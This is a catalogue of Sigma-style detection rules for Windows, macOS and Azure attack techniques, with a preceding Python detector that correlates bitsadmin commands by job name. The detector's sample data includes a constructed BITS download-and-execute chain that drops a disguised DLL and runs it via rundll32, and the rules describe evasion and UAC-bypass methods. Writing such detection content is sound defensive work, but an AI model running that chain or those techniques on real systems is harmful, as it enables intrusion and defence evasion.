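The BITS rules on this page (the bitsadmin task rules, the suspicious download extension rule and this persistence rule) look at single bitsadmin invocations, but the technique is a sequence: `/create` names a job, `/addfile` gives it a URL and a local path, `/SetNotifyCmdLine` attaches the program to run on completion, and `/resume` starts it. The following is an added example, not code from the original page or from the Sigma project, that correlates those command lines by job name and reports what each job will do, including a `/transfer` job that does everything in one line. The suspicious extension list is an assumption, and the sample command lines, hostnames and paths are constructed.

```python
import re
from typing import Dict, List

_TOKEN = re.compile(r'(?:"[^"]*"|\S)+')
# File types whose arrival via BITS deserves a look (assumed list, not the page's).
SUSPICIOUS_EXT = {".exe", ".dll", ".ps1", ".vbs", ".bat", ".cmd", ".hta", ".js", ".scr", ".sct", ".msi"}


def file_ext(path_or_url: str) -> str:
    """Lower-case extension of the last path component, ignoring any URL query string."""
    name = re.split(r"[\\/]", path_or_url.split("?", 1)[0])[-1]
    return name[name.rfind("."):].lower() if "." in name else ""


class BitsJobTracker:
    """Correlate bitsadmin command lines by job name and report what each job will do."""

    def __init__(self) -> None:
        self.jobs: Dict[str, dict] = {}

    def _job(self, name: str) -> dict:
        name = name.strip('"')
        return self.jobs.setdefault(name, {"name": name, "files": [], "notify": None, "started": False})

    def feed(self, cmdline: str) -> None:
        toks = _TOKEN.findall(cmdline)
        if not toks or toks[0].strip('"').lower().split("\\")[-1] not in ("bitsadmin", "bitsadmin.exe"):
            return
        low = [t.lower() for t in toks]
        if "/create" in low:                      # bitsadmin /create [/download|/upload] <job>
            self._job(toks[-1])
        elif "/addfile" in low:                   # bitsadmin /addfile <job> <url> <localpath>
            i = low.index("/addfile")
            if len(toks) >= i + 4:
                self._job(toks[i + 1])["files"].append((toks[i + 2], toks[i + 3].strip('"')))
        elif "/setnotifycmdline" in low:          # bitsadmin /SetNotifyCmdLine <job> <program> [params]
            i = low.index("/setnotifycmdline")
            if len(toks) >= i + 3:
                self._job(toks[i + 1])["notify"] = (toks[i + 2].strip('"'), " ".join(toks[i + 3:]))
        elif "/resume" in low:                    # bitsadmin /resume <job>
            i = low.index("/resume")
            if len(toks) > i + 1:
                self._job(toks[i + 1])["started"] = True
        elif "/transfer" in low:                  # bitsadmin /transfer <job> [type] [/priority p] <url> <local> ...
            i = low.index("/transfer")
            rest = toks[i + 1:]
            if not rest:
                return
            job = self._job(rest[0])
            rest = rest[1:]
            j = 0
            while j < len(rest) and rest[j].startswith("/"):   # skip type switches; these two take a value
                j += 2 if rest[j].lower() in ("/priority", "/aclflags") else 1
            pairs = rest[j:]
            for url, local in zip(pairs[0::2], pairs[1::2]):
                job["files"].append((url, local.strip('"')))
            job["started"] = True                 # /transfer runs the job immediately

    def findings(self) -> List[str]:
        out: List[str] = []
        for job in self.jobs.values():
            if job["notify"]:
                prog, params = job["notify"]
                cmd = f"{prog} {params}".strip()
                out.append(f"{job['name']}: executes '{cmd}' when the download completes")
            for url, local in job["files"]:
                if file_ext(local) in SUSPICIOUS_EXT:
                    out.append(f"{job['name']}: downloads executable content to {local}")
                if file_ext(url) and file_ext(url) != file_ext(local):
                    out.append(f"{job['name']}: extension mismatch {url} -> {local}")
        return out


# Constructed sequence of process-creation command lines (not from the original
# page); hostnames, paths and file names are made up.
SAMPLE_CMDLINES = [
    "bitsadmin /create /download updatejob",
    r"bitsadmin /addfile updatejob https://cdn.example.invalid/agent.png C:\ProgramData\agent.dll",
    r'bitsadmin /SetNotifyCmdLine updatejob C:\Windows\System32\rundll32.exe "C:\ProgramData\agent.dll,Start"',
    "bitsadmin /resume updatejob",
    r"bitsadmin /transfer drvfix /download /priority normal https://vendor.example.invalid/driver.cab C:\Temp\driver.cab",
    "bitsadmin /list /allusers",
]


def scan(cmdlines: List[str]) -> List[str]:
    """Feed a command-line sequence through a fresh tracker and return its findings."""
    tracker = BitsJobTracker()
    for c in cmdlines:
        tracker.feed(c)
    return tracker.findings()
```

Correlating by job name is what turns four individually bland process-creation events into one alert that names both the dropped DLL and the command that will run it. The extension-mismatch check (a `.png` URL landing as a `.dll`) is an addition beyond the page's rules; it is cheap and catches the common trick of hiding a payload behind an innocuous URL.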

Modifies the Registry From a File
level
status experimental

Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.

Modifies the Registry From a ADS
level
status experimental

Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.

Microsoft Malware Protection Engine Crash
level
status experimental

This rule detects a suspicious crash of the Microsoft Malware Protection Engine

Microsoft Defender Tamper Protection Trigger
level
status stable

Detects block of attempt to disable real time protection of Microsoft Defender by tamper protection

Malware Shellcode in Verclsid Target Process
level
status test

Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro

Malicious PE Execution by Microsoft Visual Studio Debugger
level
status experimental

The Microsoft Visual Studio Just-In-Time Debugger “vsjitdebugger.exe” has an option to launch a specified executable and attach a debugger. Adversaries may use this option to execute malicious code via a signed, verified binary. The debugger is installed alongside the Microsoft Visual Studio package.

Malicious Named Pipe
level
status experimental

Detects the creation of a named pipe used by known APT malware

Load Undocumented Autoelevated COM Interface
level
status test

Detects loading of the EditionUpgradeManager COM interface, which is not used by standard executables.

Lazarus Session Hijacker
level
status test

Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff)

Invoke-Obfuscation Via Use Rundll32
level
status test

Detects Obfuscated Powershell via use Rundll32 in Scripts

Invoke-Obfuscation Via Use Rundll32
level
status experimental

Detects Obfuscated Powershell via use Rundll32 in Scripts

Invoke-Obfuscation Via Use Rundll32
level
status experimental

Detects Obfuscated Powershell via use Rundll32 in Scripts

Invoke-Obfuscation Via Use MSHTA
level
status test

Detects Obfuscated Powershell via use MSHTA in Scripts

Invoke-Obfuscation Via Use MSHTA
level
status experimental

Detects Obfuscated Powershell via use MSHTA in Scripts

Invoke-Obfuscation Via Use MSHTA
level
status experimental

Detects Obfuscated Powershell via use MSHTA in Scripts

Invoke-Obfuscation Via Use Clip
level
status test

Detects Obfuscated Powershell via use Clip.exe in Scripts

Invoke-Obfuscation Via Use Clip
level
status experimental

Detects Obfuscated Powershell via use Clip.exe in Scripts

Invoke-Obfuscation Via Use Clip
level
status experimental

Detects Obfuscated Powershell via use Clip.exe in Scripts

Invoke-Obfuscation Via Stdin
level
status test

Detects Obfuscated Powershell via Stdin in Scripts

Invoke-Obfuscation Via Stdin
level
status experimental

Detects Obfuscated Powershell via Stdin in Scripts

Invoke-Obfuscation Via Stdin
level
status experimental

Detects Obfuscated Powershell via Stdin in Scripts

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
level
status test

Detects Obfuscated Powershell via VAR++ LAUNCHER

Invoke-Obfuscation VAR+ Launcher
level
status test

Detects Obfuscated use of Environment Variables to execute PowerShell

Invoke-Obfuscation VAR+ Launcher
level
status experimental

Detects Obfuscated use of Environment Variables to execute PowerShell

Invoke-Obfuscation VAR+ Launcher
level
status experimental

Detects Obfuscated use of Environment Variables to execute PowerShell

Invoke-Obfuscation STDIN+ Launcher
level
status test

Detects Obfuscated use of stdin to execute PowerShell

Invoke-Obfuscation STDIN+ Launcher
level
status experimental

Detects Obfuscated use of stdin to execute PowerShell

Invoke-Obfuscation STDIN+ Launcher
level
status experimental

Detects Obfuscated use of stdin to execute PowerShell

Invoke-Obfuscation RUNDLL LAUNCHER
level
status test

Detects Obfuscated Powershell via RUNDLL LAUNCHER

Invoke-Obfuscation RUNDLL LAUNCHER
level
status experimental

Detects Obfuscated Powershell via RUNDLL LAUNCHER

Invoke-Obfuscation RUNDLL LAUNCHER
level
status experimental

Detects Obfuscated Powershell via RUNDLL LAUNCHER

Invoke-Obfuscation COMPRESS OBFUSCATION
level
status test

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

Invoke-Obfuscation COMPRESS OBFUSCATION
level
status experimental

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

Invoke-Obfuscation COMPRESS OBFUSCATION
level
status experimental

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

Invoke-Obfuscation CLIP+ Launcher
level
status test

Detects Obfuscated use of Clip.exe to execute PowerShell

Invoke-Obfuscation CLIP+ Launcher
level
status experimental

Detects Obfuscated use of Clip.exe to execute PowerShell

Invoke-Obfuscation CLIP+ Launcher
level
status experimental

Detects Obfuscated use of Clip.exe to execute PowerShell

Install Root Certificate
level
status test

Detects installed new certificate

InfDefaultInstall.exe .inf Execution
level
status experimental

Executes an SCT script using scrobj.dll from a command entered into a specially prepared INF file.

Indirect Command Execution By Program Compatibility Wizard
level
status test

Detects indirect command execution via the Program Compatibility Assistant (pcwrun.exe)

Imports Registry Key From an ADS
level
status test

Detects the import of an alternate data stream to the registry with regedit.exe.

Imports Registry Key From a File
level
status test

Detects the import of the specified file to the registry with regedit.exe.

Image Load of VSS_PS.dll by Uncommon Executable
level
status experimental

Detects the image load of vss_ps.dll by uncommon executables using OriginalFileName datapoint

HTML Help Shell Spawn
level
status test

Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)

High Integrity Sdclt Process
level
status test

A general detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for UAC bypass techniques.

Hidden User Creation
level
status test

Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option

Greenbug Campaign Indicators
level
status test

Detects tools and process executions as observed in a Greenbug campaign in May 2020

Gatekeeper Bypass via Xattr
level
status test

Detects macOS Gatekeeper bypass via xattr utility

Fsutil Suspicious Invocation
level
status test

Detects suspicious parameters of fsutil (deleting the USN journal, configuring it with a small size, etc.). Might be used by ransomware during an attack (seen with NotPetya and others).

Format.com FileSystem LOLBIN
level
status experimental

Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs

Firewall Disabled via Netsh
level
status test

Detects netsh commands that turn off the Windows firewall

Fireball Archer Install
level
status test

Detects Archer malware invocation via rundll32

Findstr Launching .lnk File
level
status test

Detects usage of findstr to identify and execute a .lnk file as seen within the HHS redirect attack

File Time Attribute Change
level
status test

Detects file time attribute changes used to hide new files or changes to existing files.

File Time Attribute Change
level
status test

Detects file time attribute changes used to hide new files or changes to existing files.

File Deletion
level
status stable

Detects file deletion commands

Fax Service DLL Search Order Hijack
level
status test

The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.

Failed Code Integrity Checks
level
status stable

Code integrity failures may indicate tampered executables.

F-Secure C3 Load by Rundll32
level
status test

F-Secure C3 produces DLLs with a default exported StartNodeRelay function.

Exports Registry Key To an Alternate Data Stream
level
status test

Exports the target Registry key and hides it in the specified alternate data stream.

Execution via CL_Mutexverifiers.ps1 (2 Lines)
level
status experimental

Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module

Execution via CL_Mutexverifiers.ps1
level
status experimental

Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module

Execution via CL_Mutexverifiers.ps1
level
status experimental

Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module

Execution via CL_Invocation.ps1 (2 Lines)
level
status experimental

Detects Execution via SyncInvoke in CL_Invocation.ps1 module

Execution via CL_Invocation.ps1
level
status experimental

Detects Execution via SyncInvoke in CL_Invocation.ps1 module

Execution via CL_Invocation.ps1
level
status experimental

Detects Execution via SyncInvoke in CL_Invocation.ps1 module

Execution of Suspicious File Type Extension
level
status experimental

Checks whether the image specified in a process creation event doesn’t refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)

Execution DLL of Choice Using WAB.EXE
level
status experimental

This rule detects that the path to the DLL written in the registry is different from the default one. When launched, WAB.exe tries to load the DLL from the path stored in the registry.

Execute From Alternate Data Streams
level
status experimental

Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection

Execute Code with Pester.bat
level
status test

Detects code execution via Pester.bat (Pester - PowerShell module for testing)

Executable in ADS
level
status test

Detects the creation of an ADS data stream that contains an executable (non-empty imphash)

Encoded PowerShell Command Line
level
status test

Detects specific combinations of encoding methods in the PowerShell command lines

Enabling COR Profiler Environment Variables
level
status test

This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.

Empty User Agent
level
status test

Detects suspicious empty user agent strings in proxy logs

Empire PowerShell UAC Bypass
level
status test

Detects some Empire PowerShell UAC bypass methods

Empire Monkey
level
status test

Detects EmpireMonkey APT reported Activity

Emissary Panda Malware SLLauncher
level
status test

Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27

Dynamic C Sharp Compile Artefact
level
status experimental

When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution

DumpStack.log Defender Evasion
level
status test

Detects the use of the filename DumpStack.log to evade Microsoft Defender

Download from Suspicious Dyndns Hosts
level
status test

Detects download of certain file types from hosts with dynamic DNS names (selected list)

DNS ServerLevelPluginDll Install
level
status experimental

Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)

DNS Server Error Failed Loading the ServerLevelPluginDLL
level
status test

This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded

Dllhost Internet Connection
level
status test

Detects Dllhost that communicates with public IP addresses

DLL Injection with Tracker.exe
level
status test

This rule detects DLL injection and execution via LOLBAS - Tracker.exe

DLL Execution Via Register-cimprovider.exe
level
status test

Detects the use of register-cimprovider.exe to execute an arbitrary DLL file.

DLL Execution via Rasautou.exe
level
status test

Detects the use of Rasautou.exe to load an arbitrary DLL specified with the -d option and execute the export specified with -p.

Disabled Volume Snapshots
level
status experimental

Detects commands that temporarily turn off Volume Snapshots

Disable Windows IIS HTTP Logging
level
status experimental

Disables HTTP logging on a Windows IIS web server, as seen used by Threat Group 3390 (Bronze Union)

Disable UAC Using Registry
level
status experimental

Disable User Account Control (UAC) by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0

Disable Tamper Protection on Windows Defender
level
status experimental

Detects disabling Windows Defender Tamper Protection

Disable Security Tools
level
status test

Detects disabling security tools

Disable PUA Protection on Windows Defender
level
status experimental

Detects disabling Windows Defender PUA protection

Disable or Delete Windows Eventlog
level
status experimental

Detects commands used to disable or delete the Windows event log via the logman Windows utility

Disable Microsoft Office Security Features
level
status experimental

Disables Microsoft Office security features via the registry

Disable Microsoft Defender Firewall via Registry
level
status experimental

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage

Disable Exploit Guard Network Protection on Windows Defender
level
status experimental

Detects disabling Windows Defender Exploit Guard Network Protection

Detection of PowerShell Execution via Sqlps.exe
level
status test

This rule detects execution of PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.

Detecting Fake Instances Of Hxtsr.exe
level
status experimental

HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. HxTsr.exe is part of the Outlook apps and resides in a hidden "WindowsApps" subfolder of "C:\Program Files". Its path includes a version number, e.g., "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\HxTsr.exe". Any instance of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe

Detect Virtualbox Driver Installation OR Starting Of VMs
level
status experimental

Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.

Decode Base64 Encoded Text
level
status test

Detects usage of base64 utility to decode arbitrary base64-encoded text

Decode Base64 Encoded Text
level
status test

Detects usage of base64 utility to decode arbitrary base64-encoded text

Custom Class Execution via Xwizard
level
status test

Detects the execution of the Xwizard tool with specific arguments which are utilized to run custom class properties.

CreateDump Process Dump
level
status experimental

Detects use of the createdump.exe LOLBIN utility to dump process memory

CrackMapExec PowerShell Obfuscation
level
status test

The CrackMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.

Covenant Launcher Indicators
level
status test

Detects suspicious command lines used in Covenant launchers

COMPlus_ETWEnabled Registry Modification
level
status test

Potential adversaries stopping ETW providers recording loaded .NET assemblies.

COMPlus_ETWEnabled Registry Modification
level
status test

Potential adversaries stopping ETW providers recording loaded .NET assemblies.

COMPlus_ETWEnabled Command Line Arguments
level
status test

Potential adversaries stopping ETW providers recording loaded .NET assemblies.

Code Execution via Pcwutl.dll
level
status test

Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.

CobaltStrike Named Pipe
level
status experimental

Detects the creation of a named pipe as used by CobaltStrike

CobaltStrike Malformed UAs in Malleable Profiles
level
status experimental

Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike

CobaltStrike Load by Rundll32
level
status experimental

Rundll32 can be used by Cobalt Strike with the StartW function to load DLLs from the command line.

CobaltStrike BOF Injection Pattern
level
status experimental

Detects a typical pattern of a CobaltStrike BOF which injects into other processes

Cmd Stream Redirection
level
status experimental

Detects the redirection of an output stream of / within a Windows command line session

Certutil Encode
level
status test

Detects a suspicious certutil command used to encode files, which is sometimes used for data exfiltration

CACTUSTORCH Remote Thread Creation
level
status experimental

Detects remote thread creation from CACTUSTORCH as described in references.

Bypass UAC Using SilentCleanup Task
level
status experimental

There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe. This can be abused to elevate any file with Administrator privileges without prompting UAC

Bypass UAC Using DelegateExecute
level
status experimental

Bypasses User Account Control using a fileless method

Bitsadmin Download
level
status experimental

Detects usage of bitsadmin downloading a file

Binary Padding
level
status test

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to add junk data to a file.

Binary Padding
level
status test

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to add junk data to a file.

Base64 Encoded Reflective Assembly Load
level
status test

Detects base64 encoded .NET reflective loading of Assembly

Base64 Encoded Listing of Shadowcopy
level
status test

Detects a base64 encoded listing of Win32_Shadowcopy

Azure Service Principal Removed
level
status experimental

Identifies when a service principal was removed in Azure.

Azure Service Principal Created
level
status experimental

Identifies when a service principal is created in Azure.

Azure Owner Removed From Application or Service Principal
level
status experimental

Identifies when an owner was removed from an application or service principal in Azure.

Azure Application Deleted
level
status experimental

Identifies when an application is deleted in Azure.

AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl
level
status experimental

Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)

Atbroker Registry Change
level
status experimental

Detects creation/modification of Assistive Technology applications and persistence with usage of ATs

APT PRIVATELOG Image Load Pattern
level
status experimental

Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances

Abusing Windows Telemetry For Persistence
level
status experimental

Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.

Abusing Windows Telemetry For Persistence
level
status experimental

Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.

Abusing Print Executable
level
status test

Attackers can use print.exe for remote file copy

Abusing Findstr for Defense Evasion
level
status test

Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism
